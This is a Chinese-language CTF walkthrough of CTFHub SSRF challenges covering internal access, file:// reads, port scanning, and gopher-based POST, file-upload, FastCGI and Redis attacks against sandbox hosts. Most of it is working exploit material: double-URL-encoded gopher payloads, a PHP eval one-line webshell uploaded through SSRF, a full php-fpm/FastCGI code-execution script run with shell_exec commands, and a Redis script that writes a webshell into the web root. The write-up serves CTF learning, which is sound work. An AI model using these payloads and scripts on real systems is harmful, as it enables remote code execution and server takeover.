文章目录

  • 内网访问
  • 伪协议读取文件
  • 端口扫描
  • POST请求
  • 文件上传
  • FastCGI协议
  • Redis
  • URL Bypass
  • 数字IP Bypass
  • 302跳转 Bypass
  • DNS重绑定 Bypass

内网访问

题目:
尝试访问位于127.0.0.1的flag.php吧

解题步骤

伪协议读取文件

题目:
尝试去读取一下Web目录下的flag.php吧尝试去读取一下Web目录下的flag.php吧

解题步骤

端口扫描

题目:
来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,
根据提示对目标端口进行爆破



注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来

POST请求

注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可

题目:
这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

解题步骤
根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php

http://challenge-d01e92afbf6aa96c.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php


<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=e64d3284e9a8b1a4c3e3dcdf7d08a495-->
</form>

flag.php源码

<?phperror_reporting(0);if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {echo "Just View From 127.0.0.1";return;
}$flag=getenv("CTFHUB");
$key = md5($flag);if (isset($_POST["key"]) && $_POST["key"] == $key) {echo $flag;exit;
}
?><form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>

302.php源码

http://challenge-d01e92afbf6aa96c.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/302.php


返回404,可能环境有些许问题了,然后直接在wp中找到源码,如下

<?php
if(isset($_GET['url'])){header("Location: {$_GET[‘url‘]}");exit;
}highlight_file(__FILE__);

index.php源码

http://challenge-d01e92afbf6aa96c.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php


源码如下:

<?phperror_reporting(0);if (!isset($_REQUEST['url'])){header("Location: /?url=_");exit;
}$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

根据flag.php的源码,我们使用gopher://协议进行传输
修改请求包相关信息如下

POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 36
Content-Type: application/x-www-form-urlencodedkey=e64d3284e9a8b1a4c3e3dcdf7d08a495

因为要使用gopher://协议,所以变换一下,如下所示格式

POST /flag.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 36回车换行key=e64d3284e9a8b1a4c3e3dcdf7d08a495

转变之后,将所有除英文字母外所有符号url编码2次

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Ddd6942a5f13090a3ef0daa507d70fd98

其中%0d表示回车,%0a表示换行
其中回车的作用只是移动光标至该行的起始位置,换行至下一行行首起始位置
所以上面的%250D%250A%250D%250A需要这样写,在请求包中,如下所示的换行,是先回车,后换行的结果
注:Content-Length长度需要和传入内容的长度相等

关于URL编码

假设对/进行2次URL编码,有以下两种表达方式
第一种:%25%32%66
这种常见于bp,用在这里是不行的,不要使用bp自带的url编码,踩过坑,用下面第二种url编码格式第二种:%252f
因为%的url编码是%25,所以第1次编码,甚至3次,n次编码可以只将%进行编码即可,有时这种编码比第一种好用

文件上传

题目:
这次需要上传一个文件到flag.php了.祝你好运

file://协议访问flag.php

<?phperror_reporting(0);if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){echo "Just View From 127.0.0.1";return;
}if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){echo getenv("CTFHUB");exit;
}
?>

上传却没有确定按钮,修改html代码

<input type="submit" value="提交">

上传一句话木马文件,然后抓包

上传文件时抓包

POST /flag.php HTTP/1.1
Host: challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6494119058275
Content-Length: 228-----------------------------6494119058275
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream<?php @eval($_REQUEST[peak]);?>
-----------------------------6494119058275--

请求包一次换行和两次换行都需要进行两次url编码
换行二次编码

两层换行:%250d%250a%250d%250a
一层换行:%250d%250a

编码如下

POST /flag.php HTTP/1.1%250d%250a
Host: challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0%250d%250a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%250d%250a
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%250d%250a
Accept-Encoding: gzip, deflate%250d%250a
Referer: http://challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250a
DNT: 1%250d%250a
Connection: close%250d%250a
Upgrade-Insecure-Requests: 1%250d%250a
Content-Type: multipart/form-data; boundary=---------------------------6494119058275%250d%250a
Content-Length: 228%250d%250a%250d%250a-----------------------------6494119058275%250d%250a
Content-Disposition: form-data; name="file"; filename="2.php"%250d%250a
Content-Type: application/octet-stream%250d%250a%250d%250a<?php @eval($_REQUEST[peak]);?>%250d%250a
-----------------------------6494119058275--

调整好后payload如下:

?url=gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1%250d%250aHost: challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250aUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0%250d%250aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%250d%250aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%250d%250aAccept-Encoding: gzip, deflate%250d%250aReferer: http://challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250aDNT: 1%250d%250aConnection: close%250d%250aUpgrade-Insecure-Requests: 1%250d%250aContent-Type: multipart/form-data; boundary=---------------------------6494119058275%250d%250aContent-Length: 228%250d%250a%250d%250a-----------------------------6494119058275%250d%250aContent-Disposition: form-data; name="file"; filename="2.php"%250d%250aContent-Type: application/octet-stream%250d%250a%250d%250a
<?php @eval($_REQUEST[peak]);?>%250d%250a-----------------------------6494119058275--

FastCGI协议

题目:
这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助

解题步骤
1、使用kali监听本地传入的包

nc -lvvp 9000 | hexdump -C > 1.txt

如下所示:

2、使用脚本对目标进行传包
脚本地址:
https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
下不了的,我把脚本贴出来

import socket
import random
import argparse
import sys
from io import BytesIO# Referrer: https://github.com/wuyunfeng/Python-FastCGI-ClientPY2 = True if sys.version_info.major == 2 else Falsedef bchr(i):if PY2:return force_bytes(chr(i))else:return bytes([i])def bord(c):if isinstance(c, int):return celse:return ord(c)def force_bytes(s):if isinstance(s, bytes):return selse:return s.encode('utf-8', 'strict')def force_text(s):if issubclass(type(s), str):return sif isinstance(s, bytes):s = str(s, 'utf-8', 'strict')else:s = str(s)return sclass FastCGIClient:"""A Fast-CGI Client for Python"""# private__FCGI_VERSION = 1__FCGI_ROLE_RESPONDER = 1__FCGI_ROLE_AUTHORIZER = 2__FCGI_ROLE_FILTER = 3__FCGI_TYPE_BEGIN = 1__FCGI_TYPE_ABORT = 2__FCGI_TYPE_END = 3__FCGI_TYPE_PARAMS = 4__FCGI_TYPE_STDIN = 5__FCGI_TYPE_STDOUT = 6__FCGI_TYPE_STDERR = 7__FCGI_TYPE_DATA = 8__FCGI_TYPE_GETVALUES = 9__FCGI_TYPE_GETVALUES_RESULT = 10__FCGI_TYPE_UNKOWNTYPE = 11__FCGI_HEADER_SIZE = 8# request stateFCGI_STATE_SEND = 1FCGI_STATE_ERROR = 2FCGI_STATE_SUCCESS = 3def __init__(self, host, port, timeout, keepalive):self.host = hostself.port = portself.timeout = timeoutif keepalive:self.keepalive = 1else:self.keepalive = 0self.sock = Noneself.requests = dict()def __connect(self):self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)self.sock.settimeout(self.timeout)self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)# if self.keepalive:#     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)# else:#     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)try:self.sock.connect((self.host, int(self.port)))except socket.error as msg:self.sock.close()self.sock = Noneprint(repr(msg))return Falsereturn Truedef __encodeFastCGIRecord(self, fcgi_type, content, requestid):length = len(content)buf = bchr(FastCGIClient.__FCGI_VERSION) \+ bchr(fcgi_type) \+ bchr((requestid >> 8) & 0xFF) \+ bchr(requestid & 0xFF) \+ bchr((length >> 8) & 0xFF) \+ bchr(length & 0xFF) \+ bchr(0) \+ bchr(0) \+ contentreturn bufdef __encodeNameValueParams(self, name, value):nLen = len(name)vLen = len(value)record = b''if nLen < 128:record += bchr(nLen)else:record += bchr((nLen >> 24) | 0x80) \+ bchr((nLen >> 16) & 0xFF) \+ bchr((nLen >> 8) & 0xFF) \+ bchr(nLen & 0xFF)if vLen < 128:record += bchr(vLen)else:record += bchr((vLen >> 24) | 0x80) \+ bchr((vLen >> 16) & 0xFF) \+ bchr((vLen >> 8) & 0xFF) \+ bchr(vLen & 0xFF)return record + name + valuedef __decodeFastCGIHeader(self, stream):header = dict()header['version'] = bord(stream[0])header['type'] = bord(stream[1])header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])header['paddingLength'] = bord(stream[6])header['reserved'] = bord(stream[7])return headerdef __decodeFastCGIRecord(self, buffer):header = buffer.read(int(self.__FCGI_HEADER_SIZE))if not header:return Falseelse:record = self.__decodeFastCGIHeader(header)record['content'] = b''if 'contentLength' in record.keys():contentLength = int(record['contentLength'])record['content'] += buffer.read(contentLength)if 'paddingLength' in record.keys():skiped = buffer.read(int(record['paddingLength']))return recorddef request(self, nameValuePairs={}, post=''):if not self.__connect():print('connect failure! please check your fasctcgi-server !!')returnrequestId = random.randint(1, (1 << 16) - 1)self.requests[requestId] = dict()request = b""beginFCGIRecordContent = bchr(0) \+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \+ bchr(self.keepalive) \+ bchr(0) * 5request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,beginFCGIRecordContent, requestId)paramsRecord = b''if nameValuePairs:for (name, value) in nameValuePairs.items():name = force_bytes(name)value = force_bytes(value)paramsRecord += self.__encodeNameValueParams(name, value)if paramsRecord:request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)if post:request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)self.sock.send(request)self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SENDself.requests[requestId]['response'] = b''return self.__waitForResponse(requestId)def __waitForResponse(self, requestId):data = b''while True:buf = self.sock.recv(512)if not len(buf):breakdata += bufdata = BytesIO(data)while True:response = self.__decodeFastCGIRecord(data)if not response:breakif response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:self.requests['state'] = FastCGIClient.FCGI_STATE_ERRORif requestId == int(response['requestId']):self.requests[requestId]['response'] += response['content']if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:self.requests[requestId]return self.requests[requestId]['response']def __repr__(self):return "fastcgi connect host:{} port:{}".format(self.host, self.port)if __name__ == '__main__':parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')parser.add_argument('host', help='Target host, such as 127.0.0.1')parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)args = parser.parse_args()client = FastCGIClient(args.host, args.port, 3, 0)params = dict()documentRoot = "/"uri = args.filecontent = args.codeparams = {'GATEWAY_INTERFACE': 'FastCGI/1.0','REQUEST_METHOD': 'POST','SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),'SCRIPT_NAME': uri,'QUERY_STRING': '','REQUEST_URI': uri,'DOCUMENT_ROOT': documentRoot,'SERVER_SOFTWARE': 'php/fcgiclient','REMOTE_ADDR': '127.0.0.1','REMOTE_PORT': '9985','SERVER_ADDR': '127.0.0.1','SERVER_PORT': '80','SERVER_NAME': "localhost",'SERVER_PROTOCOL': 'HTTP/1.1','CONTENT_TYPE': 'application/text','CONTENT_LENGTH': "%d" % len(content),'PHP_VALUE': 'auto_prepend_file = php://input','PHP_ADMIN_VALUE': 'allow_url_include = On'}response = client.request(params, content)print(force_text(response))

命令如下:

python fpm.py -c "<?php var_dump(shell_exec('ls /')); ?>" -p 9000 127.0.0.1 /usr/local/lib/php/PEAR.php


3、访问1.txt文件

4、将1.txt中的内容处理一下,删除不必要的内容

5、对修改后的内容进行两次url编码

import urllib.parse
a='''01 01 be 70 00 08 00 00  00 01 00 00 00 00 00 00  01 04 be 70 01 e7 00 00  0e 02 43 4f 4e 54 45 4e  54 5f 4c 45 4e 47 54 48  33 38 0c 10 43 4f 4e 54  45 4e 54 5f 54 59 50 45  61 70 70 6c 69 63 61 74  69 6f 6e 2f 74 65 78 74  0b 04 52 45 4d 4f 54 45  5f 50 4f 52 54 39 39 38  35 0b 09 53 45 52 56 45  52 5f 4e 41 4d 45 6c 6f  63 61 6c 68 6f 73 74 11  0b 47 41 54 45 57 41 59  5f 49 4e 54 45 52 46 41  43 45 46 61 73 74 43 47  49 2f 31 2e 30 0f 0e 53  45 52 56 45 52 5f 53 4f  46 54 57 41 52 45 70 68  70 2f 66 63 67 69 63 6c  69 65 6e 74 0b 09 52 45  4d 4f 54 45 5f 41 44 44  52 31 32 37 2e 30 2e 30  2e 31 0f 1b 53 43 52 49  50 54 5f 46 49 4c 45 4e  41 4d 45 2f 75 73 72 2f  6c 6f 63 61 6c 2f 6c 69  62 2f 70 68 70 2f 50 45  41 52 2e 70 68 70 0b 1b  53 43 52 49 50 54 5f 4e  41 4d 45 2f 75 73 72 2f  6c 6f 63 61 6c 2f 6c 69  62 2f 70 68 70 2f 50 45  41 52 2e 70 68 70 09 1f  50 48 50 5f 56 41 4c 55  45 61 75 74 6f 5f 70 72  65 70 65 6e 64 5f 66 69  6c 65 20 3d 20 70 68 70  3a 2f 2f 69 6e 70 75 74  0e 04 52 45 51 55 45 53  54 5f 4d 45 54 48 4f 44  50 4f 53 54 0b 02 53 45  52 56 45 52 5f 50 4f 52  54 38 30 0f 08 53 45 52  56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50  2f 31 2e 31 0c 00 51 55  45 52 59 5f 53 54 52 49  4e 47 0f 16 50 48 50 5f  41 44 4d 49 4e 5f 56 41  4c 55 45 61 6c 6c 6f 77  5f 75 72 6c 5f 69 6e 63  6c 75 64 65 20 3d 20 4f  6e 0d 01 44 4f 43 55 4d  45 4e 54 5f 52 4f 4f 54  2f 0b 09 53 45 52 56 45  52 5f 41 44 44 52 31 32  37 2e 30 2e 30 2e 31 0b  1b 52 45 51 55 45 53 54  5f 55 52 49 2f 75 73 72  2f 6c 6f 63 61 6c 2f 6c  69 62 2f 70 68 70 2f 50  45 41 52 2e 70 68 70 01  04 be 70 00 00 00 00 01  05 be 70 00 26 00 00 3c  3f 70 68 70 20 76 61 72  5f 64 75 6d 70 28 73 68  65 6c 6c 5f 65 78 65 63  28 27 6c 73 20 2f 27 29  29 3b 20 3f 3e 01 05 be  70 00 00 00 00
'''a=a.replace('\n','').replace(' ','')
b=''
length=len(a)
for i in range(0,length,2):b+='%'+a[i]+a[i+1]
#print(b)
print(urllib.parse.quote(b))

6、使用编码后的payload找到flag文件

http://challenge-4806028dae109d0e.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:9000/_%2501%2501%2595%2575%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2595%2575%2501%25e7%2500%2500%250e%2502%2543%254f%254e%2554%2545%254e%2554%255f%254c%2545%254e%2547%2554%2548%2537%2536%250c%2510%2543%254f%254e%2554%2545%254e%2554%255f%2554%2559%2550%2545%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2574%2565%2578%2574%250b%2504%2552%2545%254d%254f%2554%2545%255f%2550%254f%2552%2554%2539%2539%2538%2535%250b%2509%2553%2545%2552%2556%2545%2552%255f%254e%2541%254d%2545%256c%256f%2563%2561%256c%2568%256f%2573%2574%2511%250b%2547%2541%2554%2545%2557%2541%2559%255f%2549%254e%2554%2545%2552%2546%2541%2543%2545%2546%2561%2573%2574%2543%2547%2549%252f%2531%252e%2530%250f%250e%2553%2545%2552%2556%2545%2552%255f%2553%254f%2546%2554%2557%2541%2552%2545%2570%2568%2570%252f%2566%2563%2567%2569%2563%256c%2569%2565%256e%2574%250b%2509%2552%2545%254d%254f%2554%2545%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250f%251b%2553%2543%2552%2549%2550%2554%255f%2546%2549%254c%2545%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%250b%251b%2553%2543%2552%2549%2550%2554%255f%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2509%251f%2550%2548%2550%255f%2556%2541%254c%2555%2545%2561%2575%2574%256f%255f%2570%2572%2565%2570%2565%256e%2564%255f%2566%2569%256c%2565%2520%253d%2520%2570%2568%2570%253a%252f%252f%2569%256e%2570%2575%2574%250e%2504%2552%2545%2551%2555%2545%2553%2554%255f%254d%2545%2554%2548%254f%2544%2550%254f%2553%2554%250b%2502%2553%2545%2552%2556%2545%2552%255f%2550%254f%2552%2554%2538%2530%250f%2508%2553%2545%2552%2556%2545%2552%255f%2550%2552%254f%2554%254f%2543%254f%254c%2548%2554%2554%2550%252f%2531%252e%2531%250c%2500%2551%2555%2545%2552%2559%255f%2553%2554%2552%2549%254e%2547%250f%2516%2550%2548%2550%255f%2541%2544%254d%2549%254e%255f%2556%2541%254c%2555%2545%2561%256c%256c%256f%2577%255f%2575%2572%256c%255f%2569%256e%2563%256c%2575%2564%2565%2520%253d%2520%254f%256e%250d%2501%2544%254f%2543%2555%254d%2545%254e%2554%255f%2552%254f%254f%2554%252f%250b%2509%2553%2545%2552%2556%2545%2552%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250b%251b%2552%2545%2551%2555%2545%2553%2554%255f%2555%2552%2549%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2501%2504%2595%2575%2500%2500%2500%2500%2501%2505%2595%2575%2500%254c%2500%2500%253c%253f%2570%2568%2570%2520%2576%2561%2572%255f%2564%2575%256d%2570%2528%2573%2568%2565%256c%256c%255f%2565%2578%2565%2563%2528%2527%2563%2561%2574%2520%252f%2566%256c%2561%2567%255f%2566%2534%2534%2562%2562%2531%2562%2562%2565%2561%2562%2532%2534%2531%2539%2564%2536%2566%2566%2531%2562%2566%2539%2565%2538%2532%2530%2530%2536%2566%2561%2566%2527%2529%2529%253b%2520%253f%253e%2501%2505%2595%2575%2500%2500%2500%2500


7、使用同样方法,制作访问该flag的payload

nc -lvvp 9000 | hexdump -C > 2.txt


python fpm.py -c "<?php var_dump(shell_exec('cat /flag_f44bb1bbeab2419d6ff1bf9e82006faf')); ?>" -p 9000 127.0.0.1 /usr/local/lib/php/PEAR.php



import urllib.parse
a='''01 01 95 75 00 08 00 00  00 01 00 00 00 00 00 00  01 04 95 75 01 e7 00 00  0e 02 43 4f 4e 54 45 4e  54 5f 4c 45 4e 47 54 48  37 36 0c 10 43 4f 4e 54  45 4e 54 5f 54 59 50 45  61 70 70 6c 69 63 61 74  69 6f 6e 2f 74 65 78 74  0b 04 52 45 4d 4f 54 45  5f 50 4f 52 54 39 39 38  35 0b 09 53 45 52 56 45  52 5f 4e 41 4d 45 6c 6f  63 61 6c 68 6f 73 74 11  0b 47 41 54 45 57 41 59  5f 49 4e 54 45 52 46 41  43 45 46 61 73 74 43 47  49 2f 31 2e 30 0f 0e 53  45 52 56 45 52 5f 53 4f  46 54 57 41 52 45 70 68  70 2f 66 63 67 69 63 6c  69 65 6e 74 0b 09 52 45  4d 4f 54 45 5f 41 44 44  52 31 32 37 2e 30 2e 30  2e 31 0f 1b 53 43 52 49  50 54 5f 46 49 4c 45 4e  41 4d 45 2f 75 73 72 2f  6c 6f 63 61 6c 2f 6c 69  62 2f 70 68 70 2f 50 45  41 52 2e 70 68 70 0b 1b  53 43 52 49 50 54 5f 4e  41 4d 45 2f 75 73 72 2f  6c 6f 63 61 6c 2f 6c 69  62 2f 70 68 70 2f 50 45  41 52 2e 70 68 70 09 1f  50 48 50 5f 56 41 4c 55  45 61 75 74 6f 5f 70 72  65 70 65 6e 64 5f 66 69  6c 65 20 3d 20 70 68 70  3a 2f 2f 69 6e 70 75 74  0e 04 52 45 51 55 45 53  54 5f 4d 45 54 48 4f 44  50 4f 53 54 0b 02 53 45  52 56 45 52 5f 50 4f 52  54 38 30 0f 08 53 45 52  56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50  2f 31 2e 31 0c 00 51 55  45 52 59 5f 53 54 52 49  4e 47 0f 16 50 48 50 5f  41 44 4d 49 4e 5f 56 41  4c 55 45 61 6c 6c 6f 77  5f 75 72 6c 5f 69 6e 63  6c 75 64 65 20 3d 20 4f  6e 0d 01 44 4f 43 55 4d  45 4e 54 5f 52 4f 4f 54  2f 0b 09 53 45 52 56 45  52 5f 41 44 44 52 31 32  37 2e 30 2e 30 2e 31 0b  1b 52 45 51 55 45 53 54  5f 55 52 49 2f 75 73 72  2f 6c 6f 63 61 6c 2f 6c  69 62 2f 70 68 70 2f 50  45 41 52 2e 70 68 70 01  04 95 75 00 00 00 00 01  05 95 75 00 4c 00 00 3c  3f 70 68 70 20 76 61 72  5f 64 75 6d 70 28 73 68  65 6c 6c 5f 65 78 65 63  28 27 63 61 74 20 2f 66  6c 61 67 5f 66 34 34 62  62 31 62 62 65 61 62 32  34 31 39 64 36 66 66 31  62 66 39 65 38 32 30 30  36 66 61 66 27 29 29 3b  20 3f 3e 01 05 95 75 00  00 00 00
'''a=a.replace('\n','').replace(' ','')
b=''
length=len(a)
for i in range(0,length,2):b+='%'+a[i]+a[i+1]
#print(b)
print(urllib.parse.quote(b))

8、使用payload查看flag内容

http://challenge-4806028dae109d0e.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:9000/_%2501%2501%2595%2575%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2595%2575%2501%25e7%2500%2500%250e%2502%2543%254f%254e%2554%2545%254e%2554%255f%254c%2545%254e%2547%2554%2548%2537%2536%250c%2510%2543%254f%254e%2554%2545%254e%2554%255f%2554%2559%2550%2545%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2574%2565%2578%2574%250b%2504%2552%2545%254d%254f%2554%2545%255f%2550%254f%2552%2554%2539%2539%2538%2535%250b%2509%2553%2545%2552%2556%2545%2552%255f%254e%2541%254d%2545%256c%256f%2563%2561%256c%2568%256f%2573%2574%2511%250b%2547%2541%2554%2545%2557%2541%2559%255f%2549%254e%2554%2545%2552%2546%2541%2543%2545%2546%2561%2573%2574%2543%2547%2549%252f%2531%252e%2530%250f%250e%2553%2545%2552%2556%2545%2552%255f%2553%254f%2546%2554%2557%2541%2552%2545%2570%2568%2570%252f%2566%2563%2567%2569%2563%256c%2569%2565%256e%2574%250b%2509%2552%2545%254d%254f%2554%2545%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250f%251b%2553%2543%2552%2549%2550%2554%255f%2546%2549%254c%2545%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%250b%251b%2553%2543%2552%2549%2550%2554%255f%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2509%251f%2550%2548%2550%255f%2556%2541%254c%2555%2545%2561%2575%2574%256f%255f%2570%2572%2565%2570%2565%256e%2564%255f%2566%2569%256c%2565%2520%253d%2520%2570%2568%2570%253a%252f%252f%2569%256e%2570%2575%2574%250e%2504%2552%2545%2551%2555%2545%2553%2554%255f%254d%2545%2554%2548%254f%2544%2550%254f%2553%2554%250b%2502%2553%2545%2552%2556%2545%2552%255f%2550%254f%2552%2554%2538%2530%250f%2508%2553%2545%2552%2556%2545%2552%255f%2550%2552%254f%2554%254f%2543%254f%254c%2548%2554%2554%2550%252f%2531%252e%2531%250c%2500%2551%2555%2545%2552%2559%255f%2553%2554%2552%2549%254e%2547%250f%2516%2550%2548%2550%255f%2541%2544%254d%2549%254e%255f%2556%2541%254c%2555%2545%2561%256c%256c%256f%2577%255f%2575%2572%256c%255f%2569%256e%2563%256c%2575%2564%2565%2520%253d%2520%254f%256e%250d%2501%2544%254f%2543%2555%254d%2545%254e%2554%255f%2552%254f%254f%2554%252f%250b%2509%2553%2545%2552%2556%2545%2552%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250b%251b%2552%2545%2551%2555%2545%2553%2554%255f%2555%2552%2549%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2501%2504%2595%2575%2500%2500%2500%2500%2501%2505%2595%2575%2500%254c%2500%2500%253c%253f%2570%2568%2570%2520%2576%2561%2572%255f%2564%2575%256d%2570%2528%2573%2568%2565%256c%256c%255f%2565%2578%2565%2563%2528%2527%2563%2561%2574%2520%252f%2566%256c%2561%2567%255f%2566%2534%2534%2562%2562%2531%2562%2562%2565%2561%2562%2532%2534%2531%2539%2564%2536%2566%2566%2531%2562%2566%2539%2565%2538%2532%2530%2530%2536%2566%2561%2566%2527%2529%2529%253b%2520%253f%253e%2501%2505%2595%2575%2500%2500%2500%2500


注意:如果使用的是nc -lvvp 9000 > 3.txt格式而不是nc -lvvp 9000 | hexdump -C > 2.txt格式,那么需要使用hexdump -C获取txt文件内容,否则会造成内容不一样,导致payload无法利用,对比下面两幅图就知道了,其中第二幅图中获取的txt内容才可获得flag

Redis

题目:
这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

解题
访问:?url=file:///var/www/html/index.php得到index.php源码

<?phperror_reporting(0);if (!isset($_REQUEST['url'])) {header("Location: /?url=_");exit;
}$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

redis写webshell:

flushall
set 1 '<?php eval($_GET["cmd"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save

使用如下脚本,将上面的写webshell代码转化为redis RESP协议的格式

import urllib
from urllib import parseprotocol = "gopher://"
ip = "127.0.0.1"
port = "6379"
shell = "\n\n<?php eval($_GET[\"peak\"]);?>\n\n"
filename = "peak.php"
path = "/var/www/html"
passwd = ""
cmd = ["flushall","set 1 {}".format(shell.replace(" ", "${IFS}")),"config set dir {}".format(path),"config set dbfilename {}".format(filename),"save"]
if passwd:cmd.insert(0, "AUTH {}".format(passwd))
payload_prefix = protocol + ip + ":" + port + "/_"
CRLF = "\r\n"def redis_format(arr):redis_arr = arr.split(" ")cmd_ = ""cmd_ += "*" + str(len(redis_arr))for x_ in redis_arr:cmd_ += CRLF + "$" + str(len((x_.replace("${IFS}", " ")))) + CRLF + x_.replace("${IFS}", " ")cmd_ += CRLFreturn cmd_if __name__ == "__main__":payload = ""for x in cmd:payload += parse.quote(redis_format(x))  # url编码payload = payload_prefix + parse.quote(payload)  # 再次url编码print(payload)

转换后的payload如下:

